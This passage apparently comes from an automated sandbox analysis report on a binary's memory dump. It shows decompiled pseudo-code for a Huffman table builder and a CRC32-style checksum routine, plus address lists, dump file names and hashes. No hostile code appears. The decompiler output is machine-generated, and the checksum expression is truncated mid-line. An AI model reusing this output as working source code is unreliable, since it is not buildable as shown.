				_t296 = _a8;
				_t280 = 0;
				_v120 = 0;
				_v116 = 0;
				_v112 = 0;
				_v108 = 0;
				_v104 = 0;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				_v60 = 0;
				_t307 = _t296;
				do {
					_t190 =  *_t248;
					_t248 =  &(_t248[1]);
					 *((intOrPtr*)(_t323 + _t190 * 4 - 0x74)) =  *((intOrPtr*)(_t323 + _t190 * 4 - 0x74)) + 1;
					_t307 = _t307 - 1;
				} while (_t307 != 0);
				if(_v120 != _t296) {
					_t297 = _a28;
					_t241 = 1;
					_t192 =  &_v116;
					_t308 =  *_t297;
					_t249 = _t241;
					_a28 = _t308;
					while( *_t192 == _t280) {
						_t249 = _t249 + 1;
						_t192 = _t192 + 4;
						if(_t249 <= 0xf) {
							continue;
						}
						break;
					}
					_v8 = _t249;
					if(_t308 < _t249) {
						_a28 = _t249;
					}
					_t309 =  &_v60;
					_t193 = 0xf;
					while( *_t309 == _t280) {
						_t193 = _t193 - 1;
						_t309 = _t309 - 4;
						if(_t193 != _t280) {
							continue;
						}
						break;
					}
					_v28 = _t193;
					if(_a28 > _t193) {
						_a28 = _t193;
					}
					_t242 = _t241 << _t249;
					 *_t297 = _a28;
					if(_t249 >= _t193) {
						L20:
						_t312 = _t193 << 2;
						_t298 =  *((intOrPtr*)(_t323 + _t312 - 0x74));
						_t250 = _t323 + _t312 - 0x74;
						_t243 = _t242 - _t298;
						_v52 = _t243;
						if(_t243 < 0) {
							goto L39;
						}
						_v180 = _t280;
						 *_t250 = _t298 + _t243;
						_t251 = 0;
						_t195 = _t193 - 1;
						if(_t195 == 0) {
							L24:
							_t244 = _a4;
							_t300 = 0;
							do {
								_t196 =  *_t244;
								_t244 =  &(_t244[1]);
								if(_t196 != _t280) {
									_t252 =  *(_t323 + _t196 * 4 - 0xb4);
									 *((intOrPtr*)(_a40 + _t252 * 4)) = _t300;
									 *(_t323 + _t196 * 4 - 0xb4) = _t252 + 1;
									_t280 = 0;
								}
								_t300 = _t300 + 1;
							} while (_t300 < _a8);
							_v12 = _v12 | 0xffffffff;
							_a8 =  *((intOrPtr*)(_t323 + _t312 - 0xb4));
							_v16 = _t280;
							_v20 = _a40;
							_t199 = _v8;
							_t246 =  ~_a28;
							_v184 = _t280;
							_v244 = _t280;
							_v32 = _t280;
							_a4 = _t280;
							if(_t199 > _v28) {
								L64:
								if(_v52 == _t280 || _v28 == 1) {
									L4:
									return 0;
								} else {
									_push(0xfffffffb);
									goto L67;
								}
							}
							_v48 = _t199 - 1;
							_v36 = _t323 + _t199 * 4 - 0x74;
							do {
								_t203 =  *_v36;
								_v24 = _t203 - 1;
								if(_t203 == 0) {
									goto L63;
								} else {
									goto L31;
								}
								do {
									L31:
									_t207 = _a28 + _t246;
									if(_v8 <= _t207) {
										L46:
										_v43 = _v8 - _t246;
										_t257 = _a40 + _a8 * 4;
										_t211 = _v20;
										if(_t211 < _t257) {
											_t212 =  *_t211;
											if(_t212 >= _a12) {
												_t214 = _t212 - _a12 << 2;
												_v44 =  *((intOrPtr*)(_t214 + _a20)) + 0x50;
												_t302 =  *(_t214 + _a16);
											} else {
												_t302 = _t212;
												asm("sbb cl, cl");
												_v44 = (_t257 & 0x000000a0) + 0x60;
											}
											_v20 =  &(_v20[4]);
											L52:
											_t313 = 1;
											_t314 = _t313 << _v8 - _t246;
											_t216 = _v16 >> _t246;
											if(_t216 >= _a4) {
												L56:
												_t217 = 1;
												_t218 = _t217 << _v48;
												_t266 = _v16;
												while((_t266 & _t218) != 0) {
													_t266 = _t266 ^ _t218;
													_t218 = _t218 >> 1;
												}
												_v16 = _t266 ^ _t218;
												_t220 = _t323 + _v12 * 4 - 0xb4;
												while(1) {
													_t315 = 1;
													if(((_t315 << _t246) - 0x00000001 & _v16) ==  *_t220) {
														goto L62;
													}
													_v12 = _v12 - 1;
													_t220 = _t220 - 4;
													_t246 = _t246 - _a28;
												}
												goto L62;
											}
											_t277 = _v32 + _t216 * 8;
											do {
												_t216 = _t216 + _t314;
												 *_t277 = _v44;
												_t277[4] = _t302;
												_t277 = _t277 + (_t314 << 3);
											} while (_t216 < _a4);
											_t280 = 0;
											goto L56;
										}
										_v44 = 0xc0;
										goto L52;
									} else {
										goto L32;
									}
									do {
										L32:
										_t269 = _a28;
										_v12 = _v12 + 1;
										_t246 = _t246 + _t269;
										_v56 = _t207 + _t269;
										_t224 = _v28 - _t246;
										_a4 = _t224;
										if(_t224 > _t269) {
											_a4 = _t269;
										}
										_t271 = _v8 - _t246;
										_t225 = 1;
										_t226 = _t225 << _t271;
										_t282 = _v24 + 1;
										if(_t226 <= _t282) {
											L40:
											_t283 = 1;
											_t228 =  *_a36;
											_t284 = _t283 << _t271;
											_a4 = _t284;
											_t319 = _t228 + _t284;
											if(_t319 > 0x5a0) {
												goto L39;
											}
										} else {
											_t320 = _v36;
											_t236 = _t226 + (_t282 | 0xffffffff) - _v24;
											if(_t271 >= _a4) {
												goto L40;
											} else {
												goto L36;
											}
											while(1) {
												L36:
												_t271 = _t271 + 1;
												if(_t271 >= _a4) {
													goto L40;
												}
												_t294 =  *((intOrPtr*)(_t320 + 4));
												_t320 = _t320 + 4;
												_t237 = _t236 << 1;
												if(_t237 <= _t294) {
													goto L40;
												}
												_t236 = _t237 - _t294;
											}
											goto L40;
										}
										_t229 = _a32 + _t228 * 8;
										_v32 = _t229;
										_t287 = _t323 + _v12 * 4 - 0xf0;
										 *_t287 = _t229;
										 *_a36 = _t319;
										_t231 = _v12;
										if(_t231 == 0) {
											 *_a24 = _v32;
										} else {
											_t321 = _v16;
											 *(_t323 + _t231 * 4 - 0xb4) = _t321;
											_t233 = _a28;
											_v44 = _t271;
											_v43 = _t233;
											_t235 = _t321 >> _t246 - _t233;
											_t275 =  *((intOrPtr*)(_t287 - 4));
											_t302 = (_v32 - _t275 >> 3) - _t235;
											 *(_t275 + _t235 * 8) = _v44;
											 *(_t275 + 4 + _t235 * 8) = _t302;
										}
										_t207 = _v56;
									} while (_v8 > _t207);
									_t280 = 0;
									goto L46;
									L62:
									_v24 = _v24 - 1;
								} while (_v24 != 0);
								L63:
								_v8 = _v8 + 1;
								_v36 = _v36 + 4;
								_v48 = _v48 + 1;
							} while (_v8 <= _v28);
							goto L64;
						}
						_t306 = 0;
						do {
							_t251 = _t251 +  *((intOrPtr*)(_t323 + _t306 - 0x70));
							_t306 = _t306 + 4;
							_t195 = _t195 - 1;
							 *((intOrPtr*)(_t323 + _t306 - 0xb0)) = _t251;
						} while (_t195 != 0);
						goto L24;
					} else {
						_t322 = _t323 + _t249 * 4 - 0x74;
						while(1) {
							_t247 = _t242 -  *_t322;
							if(_t247 < 0) {
								break;
							}
							_t249 = _t249 + 1;
							_t322 = _t322 + 4;
							_t242 = _t247 << 1;
							if(_t249 < _t193) {
								continue;
							}
							goto L20;
						}
						L39:
						_push(0xfffffffd);
						L67:
						_pop(_t194);
						return _t194;
					}
				}
				 *_a24 = 0;
				 *_a28 = 0;
				goto L4;
			}

0x00404c22
0x00404c28
0x00404c2b
0x00404c2d
0x00404c30
0x00404c33
0x00404c36
0x00404c39
0x00404c3c
0x00404c3f
0x00404c42
0x00404c45
0x00404c48
0x00404c4b
0x00404c4e
0x00404c51
0x00404c54
0x00404c57
0x00404c5a
0x00404c5d
0x00404c5f
0x00404c5f
0x00404c61
0x00404c64
0x00404c6c
0x00404c6c
0x00404c72
0x00404c85
0x00404c8a
0x00404c8b
0x00404c8e
0x00404c90
0x00404c92
0x00404c95
0x00404c99
0x00404c9a
0x00404ca0
0x00000000
0x00000000
0x00000000
0x00404ca0
0x00404ca4
0x00404ca7
0x00404ca9
0x00404ca9
0x00404cae
0x00404cb1
0x00404cb2
0x00404cb6
0x00404cb7
0x00404cbc
0x00000000
0x00000000
0x00000000
0x00404cbc
0x00404cc1
0x00404cc4
0x00404cc6
0x00404cc6
0x00404ccc
0x00404cd0
0x00404cd2
0x00404cea
0x00404cec
0x00404cef
0x00404cf3
0x00404cf7
0x00404cf9
0x00404cfc
0x00000000
0x00000000
0x00404d04
0x00404d0a
0x00404d0c
0x00404d0e
0x00404d0f
0x00404d24
0x00404d24
0x00404d27
0x00404d29
0x00404d29
0x00404d2b
0x00404d30
0x00404d32
0x00404d43
0x00404d47
0x00404d49
0x00404d49
0x00404d4b
0x00404d4c
0x00404d5b
0x00404d5f
0x00404d65
0x00404d68
0x00404d6b
0x00404d6e
0x00404d73
0x00404d79
0x00404d7f
0x00404d82
0x00404d85
0x00404f85
0x00404f88
0x00404c7e
0x00000000
0x00404f98
0x00404f98
0x00000000
0x00404f98
0x00404f88
0x00404d95
0x00404d98
0x00404d9b
0x00404d9e
0x00404da5
0x00404da8
0x00000000
0x00000000
0x00000000
0x00000000
0x00404dae
0x00404dae
0x00404db1
0x00404db6
0x00404e9a
0x00404ea2
0x00404ea8
0x00404eab
0x00404eb0
0x00404eb8
0x00404ebd
0x00404ed9
0x00404ee2
0x00404ee8
0x00404ebf
0x00404ec4
0x00404ec6
0x00404ece
0x00404ece
0x00404eeb
0x00404eef
0x00404ef9
0x00404efa
0x00404efe
0x00404f03
0x00404f23
0x00404f28
0x00404f29
0x00404f2b
0x00404f2e
0x00404f32
0x00404f34
0x00404f34
0x00404f3d
0x00404f40
0x00404f47
0x00404f4b
0x00404f54
0x00000000
0x00000000
0x00404f56
0x00404f59
0x00404f5c
0x00404f5c
0x00000000
0x00404f47
0x00404f08
0x00404f0b
0x00404f0e
0x00404f10
0x00404f17
0x00404f1a
0x00404f1c
0x00404f21
0x00000000
0x00404f21
0x00404eb2
0x00000000
0x00000000
0x00000000
0x00000000
0x00404dbc
0x00404dbc
0x00404dbc
0x00404dbf
0x00404dc4
0x00404dc6
0x00404dcc
0x00404dd0
0x00404dd3
0x00404dd5
0x00404dd5
0x00404de0
0x00404de2
0x00404de3
0x00404de5
0x00404de8
0x00404e17
0x00404e1c
0x00404e1d
0x00404e1f
0x00404e21
0x00404e24
0x00404e2d
0x00000000
0x00000000
0x00404dea
0x00404dea
0x00404df3
0x00404df8
0x00000000
0x00000000
0x00000000
0x00000000
0x00404dfa
0x00404dfa
0x00404dfa
0x00404dfe
0x00000000
0x00000000
0x00404e00
0x00404e03
0x00404e06
0x00404e0a
0x00000000
0x00000000
0x00404e0c
0x00404e0c
0x00000000
0x00404dfa
0x00404e32
0x00404e38
0x00404e3b
0x00404e42
0x00404e47
0x00404e49
0x00404e4e
0x00404e8a
0x00404e50
0x00404e50
0x00404e56
0x00404e5d
0x00404e60
0x00404e65
0x00404e6c
0x00404e6e
0x00404e79
0x00404e7b
0x00404e7e
0x00404e7e
0x00404e8c
0x00404e8f
0x00404e98
0x00000000
0x00404f61
0x00404f64
0x00404f67
0x00404f6f
0x00404f6f
0x00404f72
0x00404f79
0x00404f7c
0x00000000
0x00404d9b
0x00404d11
0x00404d13
0x00404d13
0x00404d17
0x00404d1a
0x00404d1b
0x00404d1b
0x00000000
0x00404cd4
0x00404cd4
0x00404cd8
0x00404cd8
0x00404cda
0x00000000
0x00000000
0x00404ce0
0x00404ce1
0x00404ce4
0x00404ce8
0x00000000
0x00000000
0x00000000
0x00404ce8
0x00404e10
0x00404e10
0x00404f9a
0x00404f9a
0x00000000
0x00404f9a
0x00404cd2
0x00404c77
0x00404c7c
0x00000000

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39bb7c4b20325c44dd8699449145d0d2bc85238f2d0020d1ee85a7bd7e705017
Instruction ID: 9637f4fcf05056c634a246d4ec164b1eccd92df816b65a9601eba7856632ad8a
Opcode Fuzzy Hash: 39bb7c4b20325c44dd8699449145d0d2bc85238f2d0020d1ee85a7bd7e705017
Instruction Fuzzy Hash: 36D1F5B1A002199FDF14CFA9D9805EDBBB1FF88314F25826AD959B7390D734AA41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0040541F Relevance: .1, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040541F(signed int _a4, signed char* _a8, unsigned int _a12) {
				signed int _t35;
				signed char* _t73;
				signed char* _t74;
				signed char* _t75;
				signed char* _t76;
				signed char* _t77;
				signed char* _t78;
				signed char* _t79;
				unsigned int _t85;

				_t73 = _a8;
				if(_t73 != 0) {
					_t35 =  !_a4;
					if(_a12 >= 8) {
						_t85 = _a12 >> 3;
						do {
							_a12 = _a12 - 8;
							_t74 =  &(_t73[1]);
							_t75 =  &(_t74[1]);
							_t76 =  &(_t75[1]);
							_t77 =  &(_t76[1]);
							_t78 =  &(_t77[1]);
							_t79 =  &(_t78[1]);
							_t35 = ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t78[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008 ^  *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  